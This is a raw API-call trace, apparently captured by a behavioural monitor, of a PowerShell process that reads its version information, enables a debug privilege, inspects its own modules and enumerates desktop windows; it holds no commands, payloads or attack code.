	[0105.298] lstrcpyW (in: lpString1=0x584bc0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0105.298] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x0, puLen=0x10ea90) returned 0
	[0105.298] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x0, puLen=0x10ea90) returned 0
	[0105.298] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10ea94, puLen=0x10ea90 | out: lplpBuffer=0x10ea94*=0x0, puLen=0x10ea90) returned 0
	[0105.298] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10ea88, puLen=0x10ea84 | out: lplpBuffer=0x10ea88*=0x28b4fec, puLen=0x10ea84) returned 1
	[0105.300] VerLanguageNameW (in: wLang=0x0, szLang=0x584bc0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0105.303] VerQueryValueW (in: pBlock=0x28b4f50, lpSubBlock="\\", lplpBuffer=0x10ea9c, puLen=0x10ea98 | out: lplpBuffer=0x10ea9c*=0x28b4f78, puLen=0x10ea98) returned 1
	[0105.315] GetCurrentProcessId () returned 0xb30
	[0106.148] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10e2d4 | out: lpLuid=0x10e2d4*(LowPart=0x14, HighPart=0)) returned 1
	[0106.150] GetLastError () returned 0x0
	[0106.152] GetCurrentProcess () returned 0xffffffff
	[0106.152] GetLastError () returned 0x0
	[0106.154] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x10e2d0 | out: TokenHandle=0x10e2d0*=0x304) returned 1
	[0106.155] GetLastError () returned 0x0
	[0106.261] AdjustTokenPrivileges (in: TokenHandle=0x304, DisableAllPrivileges=0, NewState=0x28b7a90*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0106.261] GetLastError () returned 0x0
	[0106.264] CloseHandle (hObject=0x304) returned 1
	[0106.264] GetLastError () returned 0x0
	[0106.460] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb30) returned 0x304
	[0106.460] GetLastError () returned 0x0
	[0106.598] EnumProcessModules (in: hProcess=0x304, lphModule=0x28b7ad4, cb=0x100, lpcbNeeded=0x10eac4 | out: lphModule=0x28b7ad4, lpcbNeeded=0x10eac4) returned 1
	[0106.600] GetLastError () returned 0x0
	[0106.833] GetModuleInformation (in: hProcess=0x304, hModule=0x221d0000, lpmodinfo=0x28b7c14, cb=0xc | out: lpmodinfo=0x28b7c14*(lpBaseOfDll=0x221d0000, SizeOfImage=0x72000, EntryPoint=0x221d7363)) returned 1
	[0106.833] GetLastError () returned 0x0
	[0106.837] GetModuleBaseNameW (in: hProcess=0x304, hModule=0x221d0000, lpBaseName=0x5f1fc0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0106.837] GetLastError () returned 0x0
	[0106.839] GetModuleFileNameExW (in: hProcess=0x304, hModule=0x221d0000, lpFilename=0x5f1fc0, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0106.839] GetLastError () returned 0x0
	[0106.841] CloseHandle (hObject=0x304) returned 1
	[0106.841] GetLastError () returned 0x0
	[0107.173] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb30) returned 0x304
	[0107.173] GetLastError () returned 0x0
	[0107.175] GetExitCodeProcess (in: hProcess=0x304, lpExitCode=0x28b70c4 | out: lpExitCode=0x28b70c4*=0x103) returned 1
	[0107.176] GetLastError () returned 0x0
	[0107.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x38b5278, Length=0x20000, ResultLength=0x10eb0c | out: SystemInformation=0x38b5278, ResultLength=0x10eb0c*=0xeab8) returned 0x0
	[0107.752] EnumWindows (lpEnumFunc=0x2873612, lParam=0x0) returned 1
	[0107.755] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.755] GetLastError () returned 0x0
	[0107.755] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.755] GetLastError () returned 0x0
	[0107.755] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.756] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.756] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.756] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.756] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.756] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.756] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.756] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x538
	[0107.757] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.757] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.757] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.757] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x514
	[0107.757] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.757] GetLastError () returned 0x0
	[0107.757] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x778
	[0107.758] GetLastError () returned 0x0
	[0107.758] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x778
	[0107.758] GetLastError () returned 0x0
	[0107.758] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.758] GetLastError () returned 0x0
	[0107.758] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.758] GetLastError () returned 0x0
	[0107.758] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.758] GetLastError () returned 0x0
	[0107.758] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xa18
	[0107.758] GetLastError () returned 0x0
	[0107.758] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x978
	[0107.758] GetLastError () returned 0x0
	[0107.759] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x838
	[0107.759] GetLastError () returned 0x0
	[0107.759] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xb2c
	[0107.759] GetLastError () returned 0x0
	[0107.760] GetWindow (hWnd=0x50160, uCmd=0x4) returned 0x0
	[0107.762] IsWindowVisible (hWnd=0x50160) returned 0
	[0107.762] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8d4
	[0107.762] GetLastError () returned 0x0
	[0107.762] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x874
	[0107.762] GetLastError () returned 0x0
	[0107.762] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9a8
	[0107.762] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xb40
	[0107.763] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xa00
	[0107.763] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.763] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.763] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.763] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.763] GetLastError () returned 0x0
	[0107.763] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.763] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.764] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.764] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.764] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9f0
	[0107.764] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9e0
	[0107.764] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9d0
	[0107.764] GetLastError () returned 0x0
	[0107.764] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9c0
	[0107.765] GetLastError () returned 0x0
	[0107.765] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9b0
	[0107.765] GetLastError () returned 0x0
	[0107.765] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9a0
	[0107.765] GetLastError () returned 0x0
	[0107.765] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x990
	[0107.765] GetLastError () returned 0x0
	[0107.765] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x980
	[0107.765] GetLastError () returned 0x0
	[0107.765] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x970
	[0107.765] GetLastError () returned 0x0
	[0107.765] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x960
	[0107.765] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x950
	[0107.766] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x940
	[0107.766] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x930
	[0107.766] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x920
	[0107.766] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x910
	[0107.766] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x900
	[0107.766] GetLastError () returned 0x0
	[0107.766] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8f0
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8e0
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8d0
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8c0
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8b0
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x8a0
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x890
	[0107.767] GetLastError () returned 0x0
	[0107.767] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x880
	[0107.768] GetLastError () returned 0x0
	[0107.768] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x870
	[0107.768] GetLastError () returned 0x0
	[0107.768] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x860
	[0107.768] GetLastError () returned 0x0
	[0107.768] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x850
	[0107.768] GetLastError () returned 0x0
	[0107.768] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x840
	[0107.768] GetLastError () returned 0x0
	[0107.768] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x830
	[0107.768] GetLastError () returned 0x0
	[0107.768] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x820
	[0107.768] GetLastError () returned 0x0
	[0107.769] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x810
	[0107.769] GetLastError () returned 0x0
	[0107.769] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x20c
	[0107.769] GetLastError () returned 0x0
	[0107.769] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7c4
	[0107.769] GetLastError () returned 0x0
	[0107.769] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xc0
	[0107.769] GetLastError () returned 0x0
	[0107.769] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x688
	[0107.769] GetLastError () returned 0x0
	[0107.769] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x6c0
	[0107.769] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x408
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7d4
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x544
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x540
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x71c
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x31c
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7ec
	[0107.770] GetLastError () returned 0x0
	[0107.770] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x5b8
	[0107.770] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x754
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x664
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x640
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x700
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x410
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7a0
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x3b4
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x5cc
	[0107.771] GetLastError () returned 0x0
	[0107.771] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x5d4
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7c0
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x364
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x240
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x560
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x57c
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7b0
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x6a4
	[0107.772] GetLastError () returned 0x0
	[0107.772] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x32c
	[0107.772] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x670
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4f0
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x514
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x50c
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x514
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x50c
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x514
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4f0
	[0107.773] GetLastError () returned 0x0
	[0107.773] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4f0
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x58c
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x578
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x530
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x508
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.774] GetLastError () returned 0x0
	[0107.774] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4f4
	[0107.774] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x794
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x448
	[0107.775] GetLastError () returned 0x0
	[0107.775] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x778
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x458
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x538
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x4ac
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x30292, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x938
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x30294, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x7c8
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x3028a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xbdc
	[0107.776] GetLastError () returned 0x0
	[0107.776] GetWindowThreadProcessId (in: hWnd=0x5026c, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0xbe0
	[0107.776] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x6015a, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x9f4
	[0107.777] GetLastError () returned 0x0
	[0107.777] GetWindowThreadProcessId (in: hWnd=0x30296, lpdwProcessId=0x10e760 | out: lpdwProcessId=0x10e760) returned 0x964
	[0107.777] GetLastError () returned 0x0
